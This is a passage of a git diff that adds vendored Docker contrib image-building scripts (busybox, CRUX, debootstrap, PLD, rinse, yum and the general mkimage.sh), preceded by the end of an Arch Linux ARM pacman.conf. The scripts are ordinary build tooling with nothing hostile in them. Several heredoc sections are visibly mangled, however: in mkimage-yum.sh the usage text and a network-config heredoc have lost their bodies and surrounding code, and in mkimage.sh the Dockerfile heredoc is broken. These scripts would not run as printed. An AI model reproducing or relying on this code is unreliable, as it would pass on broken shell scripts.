+#RootDir = / +#DBPath = /var/lib/pacman/ +#CacheDir = /var/cache/pacman/pkg/ +#LogFile = /var/log/pacman.log +#GPGDir = /etc/pacman.d/gnupg/ +HoldPkg = pacman glibc +#XferCommand = /usr/bin/curl -C - -f %u > %o +#XferCommand = /usr/bin/wget --passive-ftp -c -O %o %u +#CleanMethod = KeepInstalled +#UseDelta = 0.7 +Architecture = armv + +# Pacman won't upgrade packages listed in IgnorePkg and members of IgnoreGroup +#IgnorePkg = +#IgnoreGroup = + +#NoUpgrade = +#NoExtract = + +# Misc options +#UseSyslog +#Color +#TotalDownload +# We cannot check disk space from within a chroot environment +#CheckSpace +#VerbosePkgLists + +# By default, pacman accepts packages signed by keys that its local keyring +# trusts (see pacman-key and its man page), as well as unsigned packages. +SigLevel = Required DatabaseOptional +LocalFileSigLevel = Optional +#RemoteFileSigLevel = Required + +# NOTE: You must run `pacman-key --init` before first using pacman; the local +# keyring can then be populated with the keys of all official Arch Linux +# packagers with `pacman-key --populate archlinux`. + +# +# REPOSITORIES +# - can be defined here or included from another file +# - pacman will search repositories in the order defined here +# - local/custom mirrors can be added here or in separate files +# - repositories listed first will take precedence when packages +# have identical names, regardless of version number +# - URLs will have $repo replaced by the name of the current repo +# - URLs will have $arch replaced by the name of the architecture +# +# Repository entries are of the format: +# [repo-name] +# Server = ServerName +# Include = IncludePath +# +# The header [repo-name] is crucial - it must be present and +# uncommented to enable the repo. +# + +# The testing repositories are disabled by default. To enable, uncomment the +# repo name header and Include lines. You can add preferred servers immediately +# after the header, and they will be used before the default mirrors. 
+ +#[testing] +#Include = /etc/pacman.d/mirrorlist + +[core] +Include = /etc/pacman.d/mirrorlist + +[extra] +Include = /etc/pacman.d/mirrorlist + +#[community-testing] +#Include = /etc/pacman.d/mirrorlist + +[community] +Include = /etc/pacman.d/mirrorlist + +[alarm] +Include = /etc/pacman.d/mirrorlist + +[aur] +Include = /etc/pacman.d/mirrorlist + +# An example of a custom package repository. See the pacman manpage for +# tips on creating your own repositories. +#[custom] +#SigLevel = Optional TrustAll +#Server = file:///home/custompkgs + diff --git a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh new file mode 100755 index 0000000000..b11a6bb265 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh @@ -0,0 +1,43 @@ +#!/usr/bin/env bash +# Generate a very minimal filesystem based on busybox-static, +# and load it into the local docker under the name "busybox". + +echo >&2 +echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/busybox-static' +echo >&2 + +BUSYBOX=$(which busybox) +[ "$BUSYBOX" ] || { + echo "Sorry, I could not locate busybox." + echo "Try 'apt-get install busybox-static'?" + exit 1 +} + +set -e +ROOTFS=${TMPDIR:-/var/tmp}/rootfs-busybox-$$-$RANDOM +mkdir $ROOTFS +cd $ROOTFS + +mkdir bin etc dev dev/pts lib proc sys tmp +touch etc/resolv.conf +cp /etc/nsswitch.conf etc/nsswitch.conf +echo root:x:0:0:root:/:/bin/sh > etc/passwd +echo root:x:0: > etc/group +ln -s lib lib64 +ln -s bin sbin +cp $BUSYBOX bin +for X in $(busybox --list) +do + ln -s busybox bin/$X +done +rm bin/init +ln bin/busybox bin/init +cp /lib/x86_64-linux-gnu/lib{pthread,c,dl,nsl,nss_*}.so.* lib +cp /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 lib +for X in console null ptmx random stdin stdout stderr tty urandom zero +do + cp -a /dev/$X dev +done + +tar --numeric-owner -cf- . | docker import - busybox +docker run -i -u root busybox /bin/echo Success. 
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-crux.sh b/vendor/github.com/docker/docker/contrib/mkimage-crux.sh new file mode 100755 index 0000000000..3f0bdcae3c --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-crux.sh @@ -0,0 +1,75 @@ +#!/usr/bin/env bash +# Generate a minimal filesystem for CRUX/Linux and load it into the local +# docker as "cruxlinux" +# requires root and the crux iso (http://crux.nu) + +set -e + +die () { + echo >&2 "$@" + exit 1 +} + +[ "$#" -eq 1 ] || die "1 argument(s) required, $# provided. Usage: ./mkimage-crux.sh /path/to/iso" + +ISO=${1} + +ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/rootfs-crux-XXXXXXXXXX) +CRUX=$(mktemp -d ${TMPDIR:-/var/tmp}/crux-XXXXXXXXXX) +TMP=$(mktemp -d ${TMPDIR:-/var/tmp}/XXXXXXXXXX) + +VERSION=$(basename --suffix=.iso $ISO | sed 's/[^0-9.]*\([0-9.]*\).*/\1/') + +# Mount the ISO +mount -o ro,loop $ISO $CRUX + +# Extract pkgutils +tar -C $TMP -xf $CRUX/tools/pkgutils#*.pkg.tar.gz + +# Put pkgadd in the $PATH +export PATH="$TMP/usr/bin:$PATH" + +# Install core packages +mkdir -p $ROOTFS/var/lib/pkg +touch $ROOTFS/var/lib/pkg/db +for pkg in $CRUX/crux/core/*; do + pkgadd -r $ROOTFS $pkg +done + +# Remove agetty and inittab config +if (grep agetty ${ROOTFS}/etc/inittab 2>&1 > /dev/null); then + echo "Removing agetty from /etc/inittab ..." 
+ chroot ${ROOTFS} sed -i -e "/agetty/d" /etc/inittab + chroot ${ROOTFS} sed -i -e "/shutdown/d" /etc/inittab + chroot ${ROOTFS} sed -i -e "/^$/N;/^\n$/d" /etc/inittab +fi + +# Remove kernel source +rm -rf $ROOTFS/usr/src/* + +# udev doesn't work in containers, rebuild /dev +DEV=$ROOTFS/dev +rm -rf $DEV +mkdir -p $DEV +mknod -m 666 $DEV/null c 1 3 +mknod -m 666 $DEV/zero c 1 5 +mknod -m 666 $DEV/random c 1 8 +mknod -m 666 $DEV/urandom c 1 9 +mkdir -m 755 $DEV/pts +mkdir -m 1777 $DEV/shm +mknod -m 666 $DEV/tty c 5 0 +mknod -m 600 $DEV/console c 5 1 +mknod -m 666 $DEV/tty0 c 4 0 +mknod -m 666 $DEV/full c 1 7 +mknod -m 600 $DEV/initctl p +mknod -m 666 $DEV/ptmx c 5 2 + +IMAGE_ID=$(tar --numeric-owner -C $ROOTFS -c . | docker import - crux:$VERSION) +docker tag $IMAGE_ID crux:latest +docker run -i -t crux echo Success. + +# Cleanup +umount $CRUX +rm -rf $ROOTFS +rm -rf $CRUX +rm -rf $TMP diff --git a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh new file mode 100755 index 0000000000..412a5ce0a7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh @@ -0,0 +1,297 @@ +#!/usr/bin/env bash +set -e + +echo >&2 +echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/debootstrap' +echo >&2 + +variant='minbase' +include='iproute,iputils-ping' +arch='amd64' # intentionally undocumented for now +skipDetection= +strictDebootstrap= +justTar= + +usage() { + echo >&2 + + echo >&2 "usage: $0 [options] repo suite [mirror]" + + echo >&2 + echo >&2 'options: (not recommended)' + echo >&2 " -p set an http_proxy for debootstrap" + echo >&2 " -v $variant # change default debootstrap variant" + echo >&2 " -i $include # change default package includes" + echo >&2 " -d # strict debootstrap (do not apply any docker-specific tweaks)" + echo >&2 " -s # skip version detection and tagging (ie, precise also tagged as 12.04)" + echo >&2 " # note that this will also skip 
adding universe and/or security/updates to sources.list" + echo >&2 " -t # just create a tarball, especially for dockerbrew (uses repo as tarball name)" + + echo >&2 + echo >&2 " ie: $0 username/debian squeeze" + echo >&2 " $0 username/debian squeeze http://ftp.uk.debian.org/debian/" + + echo >&2 + echo >&2 " ie: $0 username/ubuntu precise" + echo >&2 " $0 username/ubuntu precise http://mirrors.melbourne.co.uk/ubuntu/" + + echo >&2 + echo >&2 " ie: $0 -t precise.tar.bz2 precise" + echo >&2 " $0 -t wheezy.tgz wheezy" + echo >&2 " $0 -t wheezy-uk.tar.xz wheezy http://ftp.uk.debian.org/debian/" + + echo >&2 +} + +# these should match the names found at http://www.debian.org/releases/ +debianStable=wheezy +debianUnstable=sid +# this should match the name found at http://releases.ubuntu.com/ +ubuntuLatestLTS=trusty +# this should match the name found at http://releases.tanglu.org/ +tangluLatest=aequorea + +while getopts v:i:a:p:dst name; do + case "$name" in + p) + http_proxy="$OPTARG" + ;; + v) + variant="$OPTARG" + ;; + i) + include="$OPTARG" + ;; + a) + arch="$OPTARG" + ;; + d) + strictDebootstrap=1 + ;; + s) + skipDetection=1 + ;; + t) + justTar=1 + ;; + ?) + usage + exit 0 + ;; + esac +done +shift $(($OPTIND - 1)) + +repo="$1" +suite="$2" +mirror="${3:-}" # stick to the default debootstrap mirror if one is not provided + +if [ ! "$repo" ] || [ ! 
"$suite" ]; then + usage + exit 1 +fi + +# some rudimentary detection for whether we need to "sudo" our docker calls +docker='' +if docker version > /dev/null 2>&1; then + docker='docker' +elif sudo docker version > /dev/null 2>&1; then + docker='sudo docker' +elif command -v docker > /dev/null 2>&1; then + docker='docker' +else + echo >&2 "warning: either docker isn't installed, or your current user cannot run it;" + echo >&2 " this script is not likely to work as expected" + sleep 3 + docker='docker' # give us a command-not-found later +fi + +# make sure we have an absolute path to our final tarball so we can still reference it properly after we change directory +if [ "$justTar" ]; then + if [ ! -d "$(dirname "$repo")" ]; then + echo >&2 "error: $(dirname "$repo") does not exist" + exit 1 + fi + repo="$(cd "$(dirname "$repo")" && pwd -P)/$(basename "$repo")" +fi + +# will be filled in later, if [ -z "$skipDetection" ] +lsbDist='' + +target="${TMPDIR:-/var/tmp}/docker-rootfs-debootstrap-$suite-$$-$RANDOM" + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" +returnTo="$(pwd -P)" + +if [ "$suite" = 'lucid' ]; then + # lucid fails and doesn't include gpgv in minbase; "apt-get update" fails + include+=',gpgv' +fi + +set -x + +# bootstrap +mkdir -p "$target" +sudo http_proxy=$http_proxy debootstrap --verbose --variant="$variant" --include="$include" --arch="$arch" "$suite" "$target" "$mirror" + +cd "$target" + +if [ -z "$strictDebootstrap" ]; then + # prevent init scripts from running during install/update + # policy-rc.d (for most scripts) + echo $'#!/bin/sh\nexit 101' | sudo tee usr/sbin/policy-rc.d > /dev/null + sudo chmod +x usr/sbin/policy-rc.d + # initctl (for some pesky upstart scripts) + sudo chroot . dpkg-divert --local --rename --add /sbin/initctl + sudo ln -sf /bin/true sbin/initctl + # see https://github.com/docker/docker/issues/446#issuecomment-16953173 + + # shrink the image, since apt makes us fat (wheezy: ~157.5MB vs ~120MB) + sudo chroot . 
apt-get clean + + if strings usr/bin/dpkg | grep -q unsafe-io; then + # while we're at it, apt is unnecessarily slow inside containers + # this forces dpkg not to call sync() after package extraction and speeds up install + # the benefit is huge on spinning disks, and the penalty is nonexistent on SSD or decent server virtualization + echo 'force-unsafe-io' | sudo tee etc/dpkg/dpkg.cfg.d/02apt-speedup > /dev/null + # we have this wrapped up in an "if" because the "force-unsafe-io" + # option was added in dpkg 1.15.8.6 + # (see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584254#82), + # and ubuntu lucid/10.04 only has 1.15.5.6 + fi + + # we want to effectively run "apt-get clean" after every install to keep images small (see output of "apt-get clean -s" for context) + { + aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";' + echo "DPkg::Post-Invoke { ${aptGetClean} };" + echo "APT::Update::Post-Invoke { ${aptGetClean} };" + echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";' + } | sudo tee etc/apt/apt.conf.d/no-cache > /dev/null + + # and remove the translations, too + echo 'Acquire::Languages "none";' | sudo tee etc/apt/apt.conf.d/no-languages > /dev/null + + # helpful undo lines for each the above tweaks (for lack of a better home to keep track of them): + # rm /usr/sbin/policy-rc.d + # rm /sbin/initctl; dpkg-divert --rename --remove /sbin/initctl + # rm /etc/dpkg/dpkg.cfg.d/02apt-speedup + # rm /etc/apt/apt.conf.d/no-cache + # rm /etc/apt/apt.conf.d/no-languages + + if [ -z "$skipDetection" ]; then + # see also rudimentary platform detection in hack/install.sh + lsbDist='' + if [ -r etc/lsb-release ]; then + lsbDist="$(. 
etc/lsb-release && echo "$DISTRIB_ID")" + fi + if [ -z "$lsbDist" ] && [ -r etc/debian_version ]; then + lsbDist='Debian' + fi + + case "$lsbDist" in + Debian) + # add the updates and security repositories + if [ "$suite" != "$debianUnstable" -a "$suite" != 'unstable' ]; then + # ${suite}-updates only applies to non-unstable + sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list + + # same for security updates + echo "deb http://security.debian.org/ $suite/updates main" | sudo tee -a etc/apt/sources.list > /dev/null + fi + ;; + Ubuntu) + # add the universe, updates, and security repositories + sudo sed -i " + s/ $suite main$/ $suite main universe/; p; + s/ $suite main/ ${suite}-updates main/; p; + s/ $suite-updates main/ ${suite}-security main/ + " etc/apt/sources.list + ;; + Tanglu) + # add the updates repository + if [ "$suite" = "$tangluLatest" ]; then + # ${suite}-updates only applies to stable Tanglu versions + sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list + fi + ;; + SteamOS) + # add contrib and non-free + sudo sed -i "s/ $suite main$/ $suite main contrib non-free/" etc/apt/sources.list + ;; + esac + fi + + # make sure our packages lists are as up to date as we can get them + sudo chroot . apt-get update + sudo chroot . apt-get dist-upgrade -y +fi + +if [ "$justTar" ]; then + # create the tarball file so it has the right permissions (ie, not root) + touch "$repo" + + # fill the tarball + sudo tar --numeric-owner -caf "$repo" . +else + # create the image (and tag $repo:$suite) + sudo tar --numeric-owner -c . 
| $docker import - $repo:$suite + + # test the image + $docker run -i -t $repo:$suite echo success + + if [ -z "$skipDetection" ]; then + case "$lsbDist" in + Debian) + if [ "$suite" = "$debianStable" -o "$suite" = 'stable' ] && [ -r etc/debian_version ]; then + # tag latest + $docker tag $repo:$suite $repo:latest + + if [ -r etc/debian_version ]; then + # tag the specific debian release version (which is only reasonable to tag on debian stable) + ver=$(cat etc/debian_version) + $docker tag $repo:$suite $repo:$ver + fi + fi + ;; + Ubuntu) + if [ "$suite" = "$ubuntuLatestLTS" ]; then + # tag latest + $docker tag $repo:$suite $repo:latest + fi + if [ -r etc/lsb-release ]; then + lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" + if [ "$lsbRelease" ]; then + # tag specific Ubuntu version number, if available (12.04, etc.) + $docker tag $repo:$suite $repo:$lsbRelease + fi + fi + ;; + Tanglu) + if [ "$suite" = "$tangluLatest" ]; then + # tag latest + $docker tag $repo:$suite $repo:latest + fi + if [ -r etc/lsb-release ]; then + lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" + if [ "$lsbRelease" ]; then + # tag specific Tanglu version number, if available (1.0, 2.0, etc.) + $docker tag $repo:$suite $repo:$lsbRelease + fi + fi + ;; + SteamOS) + if [ -r etc/lsb-release ]; then + lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")" + if [ "$lsbRelease" ]; then + # tag specific SteamOS version number, if available (1.0, 2.0, etc.) + $docker tag $repo:$suite $repo:$lsbRelease + fi + fi + ;; + esac + fi +fi + +# cleanup +cd "$returnTo" +sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-pld.sh b/vendor/github.com/docker/docker/contrib/mkimage-pld.sh new file mode 100755 index 0000000000..615c2030a3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-pld.sh @@ -0,0 +1,73 @@ +#!/bin/sh +# +# Generate a minimal filesystem for PLD Linux and load it into the local docker as "pld". 
+# https://www.pld-linux.org/packages/docker +# +set -e + +if [ "$(id -u)" != "0" ]; then + echo >&2 "$0: requires root" + exit 1 +fi + +image_name=pld + +tmpdir=$(mktemp -d ${TMPDIR:-/var/tmp}/pld-docker-XXXXXX) +root=$tmpdir/rootfs +install -d -m 755 $root + +# to clean up: +docker rmi $image_name || : + +# build +rpm -r $root --initdb + +set +e +install -d $root/dev/pts +mknod $root/dev/random c 1 8 -m 644 +mknod $root/dev/urandom c 1 9 -m 644 +mknod $root/dev/full c 1 7 -m 666 +mknod $root/dev/null c 1 3 -m 666 +mknod $root/dev/zero c 1 5 -m 666 +mknod $root/dev/console c 5 1 -m 660 +set -e + +poldek -r $root --up --noask -u \ + --noignore \ + -O 'rpmdef=_install_langs C' \ + -O 'rpmdef=_excludedocs 1' \ + vserver-packages \ + bash iproute2 coreutils grep poldek + +# fix netsharedpath, so containers would be able to install when some paths are mounted +sed -i -e 's;^#%_netsharedpath.*;%_netsharedpath /dev/shm:/sys:/proc:/dev:/etc/hostname;' $root/etc/rpm/macros + +# no need for alternatives +poldek-config -c $root/etc/poldek/poldek.conf ignore systemd-init + +# this makes initscripts to believe network is up +touch $root/var/lock/subsys/network + +# cleanup large optional packages +remove_packages="ca-certificates" +for pkg in $remove_packages; do + rpm -r $root -q $pkg && rpm -r $root -e $pkg --nodeps +done + +# cleanup more +rm -v $root/etc/ld.so.cache +rm -rfv $root/var/cache/hrmib/* +rm -rfv $root/usr/share/man/man?/* +rm -rfv $root/usr/share/locale/*/ +rm -rfv $root/usr/share/help/*/ +rm -rfv $root/usr/share/doc/* +rm -rfv $root/usr/src/examples/* +rm -rfv $root/usr/share/pixmaps/* + +# and import +tar --numeric-owner --xattrs --acls -C $root -c . | docker import - $image_name + +# and test +docker run -i -u root $image_name /bin/echo Success. 
+ +rm -r $tmpdir diff --git a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh new file mode 100755 index 0000000000..7e0935062f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh @@ -0,0 +1,123 @@ +#!/usr/bin/env bash +# +# Create a base CentOS Docker image. + +# This script is useful on systems with rinse available (e.g., +# building a CentOS image on Debian). See contrib/mkimage-yum.sh for +# a way to build CentOS images on systems with yum installed. + +set -e + +echo >&2 +echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/rinse' +echo >&2 + +repo="$1" +distro="$2" +mirror="$3" + +if [ ! "$repo" ] || [ ! "$distro" ]; then + self="$(basename $0)" + echo >&2 "usage: $self repo distro [mirror]" + echo >&2 + echo >&2 " ie: $self username/centos centos-5" + echo >&2 " $self username/centos centos-6" + echo >&2 + echo >&2 " ie: $self username/slc slc-5" + echo >&2 " $self username/slc slc-6" + echo >&2 + echo >&2 " ie: $self username/centos centos-5 http://vault.centos.org/5.8/os/x86_64/CentOS/" + echo >&2 " $self username/centos centos-6 http://vault.centos.org/6.3/os/x86_64/Packages/" + echo >&2 + echo >&2 'See /etc/rinse for supported values of "distro" and for examples of' + echo >&2 ' expected values of "mirror".' + echo >&2 + echo >&2 'This script is tested to work with the original upstream version of rinse,' + echo >&2 ' found at http://www.steve.org.uk/Software/rinse/ and also in Debian at' + echo >&2 ' http://packages.debian.org/wheezy/rinse -- as always, YMMV.' 
+ echo >&2 + exit 1 +fi + +target="${TMPDIR:-/var/tmp}/docker-rootfs-rinse-$distro-$$-$RANDOM" + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" +returnTo="$(pwd -P)" + +rinseArgs=( --arch amd64 --distribution "$distro" --directory "$target" ) +if [ "$mirror" ]; then + rinseArgs+=( --mirror "$mirror" ) +fi + +set -x + +mkdir -p "$target" + +sudo rinse "${rinseArgs[@]}" + +cd "$target" + +# rinse fails a little at setting up /dev, so we'll just wipe it out and create our own +sudo rm -rf dev +sudo mkdir -m 755 dev +( + cd dev + sudo ln -sf /proc/self/fd ./ + sudo mkdir -m 755 pts + sudo mkdir -m 1777 shm + sudo mknod -m 600 console c 5 1 + sudo mknod -m 600 initctl p + sudo mknod -m 666 full c 1 7 + sudo mknod -m 666 null c 1 3 + sudo mknod -m 666 ptmx c 5 2 + sudo mknod -m 666 random c 1 8 + sudo mknod -m 666 tty c 5 0 + sudo mknod -m 666 tty0 c 4 0 + sudo mknod -m 666 urandom c 1 9 + sudo mknod -m 666 zero c 1 5 +) + +# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target" +# locales +sudo rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive} +# docs and man pages +sudo rm -rf usr/share/{man,doc,info,gnome/help} +# cracklib +sudo rm -rf usr/share/cracklib +# i18n +sudo rm -rf usr/share/i18n +# yum cache +sudo rm -rf var/cache/yum +sudo mkdir -p --mode=0755 var/cache/yum +# sln +sudo rm -rf sbin/sln +# ldconfig +#sudo rm -rf sbin/ldconfig +sudo rm -rf etc/ld.so.cache var/cache/ldconfig +sudo mkdir -p --mode=0755 var/cache/ldconfig + +# allow networking init scripts inside the container to work without extra steps +echo 'NETWORKING=yes' | sudo tee etc/sysconfig/network > /dev/null + +# to restore locales later: +# yum reinstall glibc-common + +version= +if [ -r etc/redhat-release ]; then + version="$(sed -E 's/^[^0-9.]*([0-9.]+).*$/\1/' etc/redhat-release)" +elif [ -r etc/SuSE-release ]; then + version="$(awk '/^VERSION/ { print $3 }' etc/SuSE-release)" +fi + +if [ -z "$version" ]; then + echo 
>&2 "warning: cannot autodetect OS version, using $distro as tag" + sleep 20 + version="$distro" +fi + +sudo tar --numeric-owner -c . | docker import - $repo:$version + +docker run -i -t $repo:$version echo success + +cd "$returnTo" +sudo rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh new file mode 100755 index 0000000000..29da170480 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh @@ -0,0 +1,136 @@ +#!/usr/bin/env bash +# +# Create a base CentOS Docker image. +# +# This script is useful on systems with yum installed (e.g., building +# a CentOS image on CentOS). See contrib/mkimage-rinse.sh for a way +# to build CentOS images on other systems. + +set -e + +usage() { + cat < +OPTIONS: + -p "" The list of packages to install in the container. + The default is blank. + -g "" The groups of packages to install in the container. + The default is "Core". + -y The path to the yum config to install packages from. The + default is /etc/yum.conf for Centos/RHEL and /etc/dnf/dnf.conf for Fedora +EOOPTS + exit 1 +} + +# option defaults +yum_config=/etc/yum.conf +if [ -f /etc/dnf/dnf.conf ] && command -v dnf &> /dev/null; then + yum_config=/etc/dnf/dnf.conf + alias yum=dnf +fi +install_groups="Core" +while getopts ":y:p:g:h" opt; do + case $opt in + y) + yum_config=$OPTARG + ;; + h) + usage + ;; + p) + install_packages="$OPTARG" + ;; + g) + install_groups="$OPTARG" + ;; + \?) 
+ echo "Invalid option: -$OPTARG" + usage + ;; + esac +done +shift $((OPTIND - 1)) +name=$1 + +if [[ -z $name ]]; then + usage +fi + +target=$(mktemp -d --tmpdir $(basename $0).XXXXXX) + +set -x + +mkdir -m 755 "$target"/dev +mknod -m 600 "$target"/dev/console c 5 1 +mknod -m 600 "$target"/dev/initctl p +mknod -m 666 "$target"/dev/full c 1 7 +mknod -m 666 "$target"/dev/null c 1 3 +mknod -m 666 "$target"/dev/ptmx c 5 2 +mknod -m 666 "$target"/dev/random c 1 8 +mknod -m 666 "$target"/dev/tty c 5 0 +mknod -m 666 "$target"/dev/tty0 c 4 0 +mknod -m 666 "$target"/dev/urandom c 1 9 +mknod -m 666 "$target"/dev/zero c 1 5 + +# amazon linux yum will fail without vars set +if [ -d /etc/yum/vars ]; then + mkdir -p -m 755 "$target"/etc/yum + cp -a /etc/yum/vars "$target"/etc/yum/ +fi + +if [[ -n "$install_groups" ]]; +then + yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ + --setopt=group_package_types=mandatory -y groupinstall $install_groups +fi + +if [[ -n "$install_packages" ]]; +then + yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \ + --setopt=group_package_types=mandatory -y install $install_packages +fi + +yum -c "$yum_config" --installroot="$target" -y clean all + +cat > "$target"/etc/sysconfig/network <&2 "warning: cannot autodetect OS version, using '$name' as tag" + version=$name +fi + +tar --numeric-owner -c -C "$target" . 
| docker import - $name:$version + +docker run -i -t --rm $name:$version /bin/bash -c 'echo success' + +rm -rf "$target" diff --git a/vendor/github.com/docker/docker/contrib/mkimage.sh b/vendor/github.com/docker/docker/contrib/mkimage.sh new file mode 100755 index 0000000000..13298c8036 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage.sh @@ -0,0 +1,128 @@ +#!/usr/bin/env bash +set -e + +mkimg="$(basename "$0")" + +usage() { + echo >&2 "usage: $mkimg [-d dir] [-t tag] [--compression algo| --no-compression] script [script-args]" + echo >&2 " ie: $mkimg -t someuser/debian debootstrap --variant=minbase jessie" + echo >&2 " $mkimg -t someuser/ubuntu debootstrap --include=ubuntu-minimal --components=main,universe trusty" + echo >&2 " $mkimg -t someuser/busybox busybox-static" + echo >&2 " $mkimg -t someuser/centos:5 rinse --distribution centos-5" + echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4" + echo >&2 " $mkimg -t someuser/mageia:4 mageia-urpmi --version=4 --mirror=http://somemirror/" + echo >&2 " $mkimg -t someuser/solaris solaris" + exit 1 +} + +scriptDir="$(dirname "$(readlink -f "$BASH_SOURCE")")/mkimage" + +os= +os=$(uname -o) + +# set up path to gnu tools if solaris +[[ $os == "Solaris" ]] && export PATH=/usr/gnu/bin:$PATH +# TODO check for gnu-tar, gnu-getopt + +# TODO requires root/sudo due to some pkg operations. sigh. 
+[[ $os == "Solaris" && $EUID != "0" ]] && echo >&2 "image create on Solaris requires superuser privilege" + +optTemp=$(getopt --options '+d:t:c:hC' --longoptions 'dir:,tag:,compression:,no-compression,help' --name "$mkimg" -- "$@") +eval set -- "$optTemp" +unset optTemp + +dir= +tag= +compression="auto" +while true; do + case "$1" in + -d|--dir) dir="$2" ; shift 2 ;; + -t|--tag) tag="$2" ; shift 2 ;; + --compression) compression="$2" ; shift 2 ;; + --no-compression) compression="none" ; shift 1 ;; + -h|--help) usage ;; + --) shift ; break ;; + esac +done + +script="$1" +[ "$script" ] || usage +shift + +if [ "$compression" == 'auto' ] || [ -z "$compression" ] +then + compression='xz' +fi + +[ "$compression" == 'none' ] && compression='' + +if [ ! -x "$scriptDir/$script" ]; then + echo >&2 "error: $script does not exist or is not executable" + echo >&2 " see $scriptDir for possible scripts" + exit 1 +fi + +# don't mistake common scripts like .febootstrap-minimize as image-creators +if [[ "$script" == .* ]]; then + echo >&2 "error: $script is a script helper, not a script" + echo >&2 " see $scriptDir for possible scripts" + exit 1 +fi + +delDir= +if [ -z "$dir" ]; then + dir="$(mktemp -d ${TMPDIR:-/var/tmp}/docker-mkimage.XXXXXXXXXX)" + delDir=1 +fi + +rootfsDir="$dir/rootfs" +( set -x; mkdir -p "$rootfsDir" ) + +# pass all remaining arguments to $script +"$scriptDir/$script" "$rootfsDir" "$@" + +# Docker mounts tmpfs at /dev and procfs at /proc so we can remove them +rm -rf "$rootfsDir/dev" "$rootfsDir/proc" +mkdir -p "$rootfsDir/dev" "$rootfsDir/proc" + +# make sure /etc/resolv.conf has something useful in it +mkdir -p "$rootfsDir/etc" +cat > "$rootfsDir/etc/resolv.conf" <<'EOF' +nameserver 8.8.8.8 +nameserver 8.8.4.4 +EOF + +tarFile="$dir/rootfs.tar${compression:+.$compression}" +touch "$tarFile" + +( + set -x + tar --numeric-owner --create --auto-compress --file "$tarFile" --directory "$rootfsDir" --transform='s,^./,,' . 
+) + +echo >&2 "+ cat > '$dir/Dockerfile'" +cat > "$dir/Dockerfile" <> "$dir/Dockerfile" ) + break + fi +done + +( set -x; rm -rf "$rootfsDir" ) + +if [ "$tag" ]; then + ( set -x; docker build -t "$tag" "$dir" ) +elif [ "$delDir" ]; then + # if we didn't specify a tag and we're going to delete our dir, let's just build an untagged image so that we did _something_ + ( set -x; docker build "$dir" ) +fi + +if [ "$delDir" ]; then + ( set -x; rm -rf "$dir" ) +fi diff --git a/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize b/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize new file mode 100755 index 0000000000..7749e63fb0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize @@ -0,0 +1,28 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +( + cd "$rootfsDir" + + # effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target" + # locales + rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive} + # docs and man pages + rm -rf usr/share/{man,doc,info,gnome/help} + # cracklib + rm -rf usr/share/cracklib + # i18n + rm -rf usr/share/i18n + # yum cache + rm -rf var/cache/yum + mkdir -p --mode=0755 var/cache/yum + # sln + rm -rf sbin/sln + # ldconfig + #rm -rf sbin/ldconfig + rm -rf etc/ld.so.cache var/cache/ldconfig + mkdir -p --mode=0755 var/cache/ldconfig +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/busybox-static b/vendor/github.com/docker/docker/contrib/mkimage/busybox-static new file mode 100755 index 0000000000..e15322b49d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/busybox-static @@ -0,0 +1,34 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +busybox="$(which busybox 2>/dev/null || true)" +if [ -z "$busybox" ]; then + echo >&2 'error: busybox: not found' + echo >&2 ' install it with your distribution "busybox-static" package' + exit 1 +fi +if ! 
